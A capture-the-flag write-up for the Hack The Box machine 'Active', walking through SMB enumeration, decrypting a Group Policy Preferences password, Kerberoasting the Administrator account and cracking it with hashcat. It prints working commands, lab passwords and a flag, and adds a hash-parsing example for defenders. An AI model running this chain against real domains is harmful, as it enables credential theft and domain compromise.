Active – Hack The Box

Kerberoasting

Task 1 – How many SMB shares are shared by the target?

  • Let’s start by enumerating open ports with nmap:
nmap -sV -sC -sT 10.129.2.174                                 
Starting Nmap 7.95 ( <https://nmap.org> ) at 2026-02-12 20:04 CET
Nmap scan report for 10.129.2.174
Host is up (0.75s latency).
Not shown: 983 closed tcp ports (conn-refused)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-02-12 19:04:10Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2026-02-12T19:05:04
|_  start_date: 2026-02-12T18:58:25

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 69.69 seconds

  • Port 445 is open, so the host serves SMB. Let’s enumerate the shares using enum4linux:
enum4linux -S 10.129.2.174
Starting enum4linux v0.9.1 ( <http://labs.portcullis.co.uk/application/enum4linux/> ) on Thu Feb 12 20:11:05 2026

 =========================================( Target Information )=========================================                                                         
                                                                                 
Target ........... 10.129.2.174                                                  
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ============================( Enumerating Workgroup/Domain on 10.129.2.174 )============================                                                         
                                                                                 
                                                                                 
[E] Can't find workgroup/domain                                                  
                                                                                 
                                                                                 

 ===================================( Session Check on 10.129.2.174 )===================================                                                          
                                                                                 
                                                                                 
[+] Server 10.129.2.174 allows sessions using username '', password ''           
                                                                                 
                                                                                 
 ================================( Getting domain SID for 10.129.2.174 )================================                                                          
                                                                                 
do_cmd: Could not initialise lsarpc. Error was NT_STATUS_ACCESS_DENIED           

[+] Can't determine if host is part of domain or part of a workgroup             
                                                                                 
                                                                                 
 =================================( Share Enumeration on 10.129.2.174 )=================================                                                          
                                                                                 
do_connect: Connection to 10.129.2.174 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Replication     Disk      
        SYSVOL          Disk      Logon server share 
        Users           Disk      
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.129.2.174                                     
                                                                                 
//10.129.2.174/ADMIN$   Mapping: DENIED Listing: N/A Writing: N/A                
//10.129.2.174/C$       Mapping: DENIED Listing: N/A Writing: N/A
//10.129.2.174/IPC$     Mapping: OK Listing: DENIED Writing: N/A
//10.129.2.174/NETLOGON Mapping: DENIED Listing: N/A Writing: N/A
//10.129.2.174/Replication      Mapping: OK Listing: OK Writing: N/A
//10.129.2.174/SYSVOL   Mapping: DENIED Listing: N/A Writing: N/A
//10.129.2.174/Users    Mapping: DENIED Listing: N/A Writing: N/A
enum4linux complete on Thu Feb 12 20:11:17 2026

  • We get 7 shares: ADMIN$, C$, IPC$, NETLOGON, Replication, SYSVOL and Users. Only Replication could be both mapped and listed without credentials.

Task 2 – What is the name of the share that allows anonymous read access?

  • We try to connect to each share with smbclient; the Replication share accepts an anonymous login, matching the enum4linux mapping results above:
smbclient \\\\10.129.2.174\\Replication
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> 
  • Inside Replication we find an active.htb folder. I downloaded everything in it using the following commands:
recurse ON
mget *

Task 3 – Which file has encrypted account credentials in it?

  • Digging through the folders we downloaded, we find Groups.xml, which contains credentials.
  • The encrypted credentials are:
- username: active.htb\SVC_TGS
- password: edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

Task 4 – What is the decrypted password for the SVC_TGS account?

  • Groups.xml is a Group Policy Preferences (GPP) file, and the cpassword value it holds is encrypted with AES using a static key that Microsoft itself published. Anyone who can read the file can therefore recover the password.
  • We can decrypt it using gpp-decrypt on Kali Linux:
┌──(kali㉿kali)-[~/Desktop]
└─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
  • Now we have the following credentials:
- username: active.htb\SVC_TGS
- password: GPPstillStandingStrong2k18
  • Using the credentials found, I tried to connect to the shares again. I got access to the Users share:
┌──(kali㉿kali)-[~/Desktop]
└─$ smbclient //10.129.2.174/Users -U active.htb\\SVC_TGS
Password for [ACTIVE.HTB\SVC_TGS]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sat Jul 21 16:39:20 2018
  ..                                 DR        0  Sat Jul 21 16:39:20 2018
  Administrator                       D        0  Mon Jul 16 12:14:21 2018
  All Users                       DHSrn        0  Tue Jul 14 07:06:44 2009
  Default                           DHR        0  Tue Jul 14 08:38:21 2009
  Default User                    DHSrn        0  Tue Jul 14 07:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 06:57:55 2009
  Public                             DR        0  Tue Jul 14 06:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 17:16:32 2018

                5217023 blocks of size 4096. 279525 blocks available
smb: \> 

  • I then found the flag in SVC_TGS\Desktop\user.txt:
a1afd274962a74d4297861b9f2a6bd31

Task 6 – Which service account on Active is vulnerable to Kerberoasting?

  • With the SVC_TGS credentials we can ask the domain controller for accounts that have a Service Principal Name, using impacket's GetUserSPNs.py:
┌──(kali㉿kali)-[~/Desktop]
└─$ ./GetUserSPNs.py -dc-ip 10.129.2.174 active.htb/SVC_TGS
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 21:06:40.351723  2026-02-12 19:59:30.267352   
  • The Administrator account has an SPN registered (active/CIFS:445), so it is the account vulnerable to Kerberoasting.

Task 7 – What is the plaintext password for the administrator account?

└─$ ./GetUserSPNs.py -dc-ip 10.129.2.174 active.htb/SVC_TGS -request-user Administrator
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 21:06:40.351723  2026-02-12 19:59:30.267352             

[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$f2a948cec4a64300405ea86b517a3b9d$[remainder of hash truncated]
  • I then saved the hash to a file
  • I then cracked the hash using hashcat and the following command:
hashcat -m 13100 hash /usr/share/wordlists/rockyou.txt
  • The password is Ticketmaster1968 and we now have the following credentials:
- username: Administrator
- password: Ticketmaster1968
  • I then connected to the Users share using the Administrator credentials:
smbclient //10.129.2.174/Users -U active.htb\\Administrator
  • The flag can be found in Administrator\Desktop\root.txt
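An added example, not part of the original writeup, that parses the $krb5tgs$ line GetUserSPNs.py printed above (the format hashcat -m 13100 consumes). It also accepts the AES layouts impacket emits for etypes 17 and 18, so a defender reviewing captured hashes can tell which tickets were issued with the legacy RC4 type; TGSHash and ParseKrb5TGS are names chosen here, and any encrypted-part bytes used for testing are constructed.

```go
package main

import (
	"encoding/hex"
	"fmt"
	"strconv"
	"strings"
)

// TGSHash is one Kerberoast line as GetUserSPNs.py prints it
// (hashcat modes 13100 for etype 23, 19600/19700 for etypes 17/18).
type TGSHash struct {
	Etype            int    // 23 = RC4-HMAC (key is the NT hash, cracks fastest); 17/18 = AES
	User, Realm, SPN string
	Checksum         []byte // 16 bytes (HMAC-MD5) for RC4, 12 bytes (HMAC-SHA1-96) for AES
	EncPartBytes     int    // size of the encrypted ticket part the cracker brute-forces
}

// ParseKrb5TGS handles both layouts impacket emits:
//   RC4: $krb5tgs$23$*user$REALM$spn*$<checksum hex>$<enc-part hex>
//   AES: $krb5tgs$18$user$REALM$*spn*$<checksum hex>$<enc-part hex>
func ParseKrb5TGS(line string) (*TGSHash, error) {
	p := strings.Split(strings.TrimSpace(line), "$")
	if len(p) != 8 || p[0] != "" || p[1] != "krb5tgs" {
		return nil, fmt.Errorf("want 8 '$'-separated fields starting with $krb5tgs, got %d", len(p))
	}
	etype, err := strconv.Atoi(p[2])
	if err != nil {
		return nil, err
	}
	h := &TGSHash{Etype: etype, Realm: p[4]}
	wantSum := 12
	switch {
	case etype == 23 && strings.HasPrefix(p[3], "*") && strings.HasSuffix(p[5], "*"):
		h.User, h.SPN, wantSum = p[3][1:], strings.TrimSuffix(p[5], "*"), 16
	case (etype == 17 || etype == 18) && len(p[5]) > 2 && p[5][0] == '*' && p[5][len(p[5])-1] == '*':
		h.User, h.SPN = p[3], p[5][1:len(p[5])-1]
	default:
		return nil, fmt.Errorf("etype %d: unsupported etype or '*' markers not where its layout puts them", etype)
	}
	if h.Checksum, err = hex.DecodeString(p[6]); err != nil || len(h.Checksum) != wantSum {
		return nil, fmt.Errorf("etype %d checksum must be %d hex-encoded bytes", etype, wantSum)
	}
	enc, err := hex.DecodeString(p[7])
	if err != nil || len(enc) == 0 {
		return nil, fmt.Errorf("encrypted part must be non-empty hex")
	}
	h.EncPartBytes = len(enc)
	return h, nil
}
```

Etype 23 in the line is the detail worth noticing: the ticket was issued with RC4, so the brute force targets the NT hash directly, which is why restricting service accounts to AES and giving them long random passwords (or gMSAs) is the usual mitigation.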

Summary

Active is an easy-level Windows machine on Hack The Box that focuses on fundamental Active Directory enumeration and Kerberoasting. Initial access begins with SMB enumeration: the Replication share allows anonymous read access, and inside its active.htb folder a Group Policy Preferences file (Groups.xml) holds a cpassword for the SVC_TGS account that decrypts with Microsoft's published static AES key. With those credentials, accounts that have Service Principal Names (SPNs) are enumerated using GetUserSPNs.py, which shows that the Administrator account has an SPN. A Kerberos Ticket Granting Service (TGS) ticket is then requested for that account, yielding a hash encrypted with the account’s password, which is cracked offline with hashcat. Because the Kerberoastable account is the domain Administrator, this leads directly to full domain compromise. Overall, Active is a strong introduction to Kerberos abuse in Active Directory environments and demonstrates how a privileged account with an SPN and a crackable password can lead to complete administrative access.